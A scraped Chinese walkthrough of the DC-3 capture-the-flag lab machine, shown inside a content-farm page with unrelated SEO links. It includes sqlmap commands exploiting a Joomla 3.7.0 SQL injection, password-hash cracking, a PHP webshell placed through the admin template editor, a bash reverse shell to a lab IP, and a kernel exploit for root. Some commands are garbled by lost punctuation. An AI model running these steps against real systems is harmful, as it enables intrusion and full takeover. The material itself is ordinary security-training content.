当前位置: 首页 > news >正文

密云城市建设官方网站crm管理软件

密云城市建设官方网站,crm管理软件,做一个高端网站,微网站开发 phpDC-3 January 3, 2024 4:11 PM Tags#xff1a;Joomla owner#xff1a;只惠摸鱼 信息收集 探测靶机ip#xff1a; 192.168.199.133 nmap 扫描端口、 系统版本 漏洞 发现只有80端口开发#xff0c; 且有cve-2017-8917漏洞存在是Joomla的SQL注入漏洞 Joomla版本为3.7.0…DC-3 January 3, 2024 4:11 PM TagsJoomla owner只惠摸鱼 信息收集 探测靶机ip 192.168.199.133 nmap 扫描端口、 系统版本 漏洞 发现只有80端口开发 且有cve-2017-8917漏洞存在是Joomla的SQL注入漏洞 Joomla版本为3.7.0 打开页面看一下发现有登录页面可以尝试弱口令sql注入 或 爆破页面有提示。只有一个flag且为root权限才能看到 尝试弱口令无果 漏洞利用 使用kali中searchsploit 搜索cve-2017-8917 即搜索joomla 3.7.0的漏洞 查看内容 searchsploit -x php/webapps/42033.txt 发现可以直接使用sqlmap 爆数据库 SQLmap爆数据 爆数据库默认配置选项 sqlmap -u “http://192.168.199.133/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml” --risk3 --level5 --random-agent --dbs -p list[fullordering] 得到数据库joomladb 爆数据库表 sqlmap -u “http://192.168.199.133/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml” --risk3 --level5 --random-agent -D “joomladb” --tables --batch -p list[fullordering] —batch是为了使其默认使用默认配置选项 得到表#__users 爆表字段名不能使用默认需要手动y一下 sqlmap -u “http://192.168.199.133/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml” --risk3 --level5 --random-agent -D “joomladb” -T “#__users” --columns -p list[fullordering] 只需查字段username 和 password中的值就可以了 爆数据 sqlmap -u “http://192.168.199.133/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml” --risk3 --level5 --random-agent -D “joomladb” -T “#__users” -C “username,password” --dump -p list[fullordering] 拿到admin账号 和一个 hash加密的密码 john解密 密码$2y 10 10 10DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu放入txt文档 使用john进行解密 得到管理员账户密码 发现还没有扫过目录扫一下看看是不是有管理员登录端80端口只有用户端 dirb http://192.168.199.133 发现有管理员页面 使用刚才得到的管理员账号密码登录进入后端管理页面 寻找是否有能上传文件的地方尝试了一些都不太行最后找到了一个可以直接写php代码的页面。 新增一个php文件类型写入一句话木马 发现上方有提示的路径尝试直接访问一下 发现不通 百度了joomla的文件路径 发现一个熟悉的单词 尝试用这个试一下没报错有戏 继续尝试目录或文件发现没报错。 尝试一下phpinfo()成功 使用蚁剑直接连接 成功连接 打开命令端口发现不是root 也不是管理员权限 提权 查看系统内核版本 直接使用searchsploit Ubuntu 16.04查询相关漏洞对比内核版本和漏洞类型使用39772 查看漏洞内容最上面的连接可以直接拉到浏览器查看详细信息个人认为比较方便 searchsploit -x linux/local/39772.txt 根据漏洞信息和下方提供的漏洞下载链接下载到kali通过蚁剑上传到后台解压exploit这里是我运行过一次 将shell反弹给本地 本地监听1234端口 被控端运行bash -c bash -i /dev/tcp/192.168.199.129/1234 01’ 本地得到shell 进入到ebpf_mapfd_doubleput_exploit运行./compile.sh会生成doubleput 然后再运行./doubleput等待数秒得到root权限 生成交互性shell python3 -c import pty; pty.spawn(“/bin/bash”)’ 进入/root 查询文件找到flag。
http://www.hkea.cn/news/14563219/

相关文章:

  • 南昌网站建设策划游戏开发开局协议三
  • 橘子seo查询推广网站seo
  • dw怎样建设网站汽车电商网站建设
  • 热门专业郑州做网站优化公司
  • 签约做网站模板深圳沙井做网站
  • jsp网站开发标准郑州高考网站建设
  • 河南住房与城乡建设厅网站做统计图的网站
  • 网站开发技术基础教程网店设计方案范文
  • 百度没有收录网站泰安九五兴昇网络科技
  • 网站建设 品牌塑造计划哪些网站做的美
  • 做一年的网站维护价格做风投要关注哪些网站
  • 前端可以做网站吗帮别人做网站服务器
  • 企业网站建设需要哪些步骤重庆logo设计图片
  • 衡水手机网站建设公司cpa免费视频
  • 英文都不懂 学网站建设维护难吗濮阳微信网站建设
  • 最新备案网站查询九狐建设网站
  • 网站建设策划公司地址外汇做单记录做单专业网站有哪些
  • 网站建设技术方面论文wordpress 群发邮件
  • 卖产品的网站怎么做的腾讯云搭建单窗口单ip
  • 高校网站建设 安全教育淮安网站设计
  • 傻瓜网站建设网站建设跟网站开发有什么区别吗
  • 网站开发的高级阶段包括什么网站建设优化解析
  • 互联国际网站做海报的简易网站
  • 云盘可以做网站吗北京专业建设
  • 网站怎么做 织梦咖啡seo是什么意思
  • 公关网站建设怎么做一个门户网站
  • 长安响应式网站建设海外网站制作
  • 怎样把网站打包做百度小程序住房和城乡建设局网站
  • 博客网站做外贸可以吗用vs2015做网站教程
  • 后台网站怎么做视频汕头网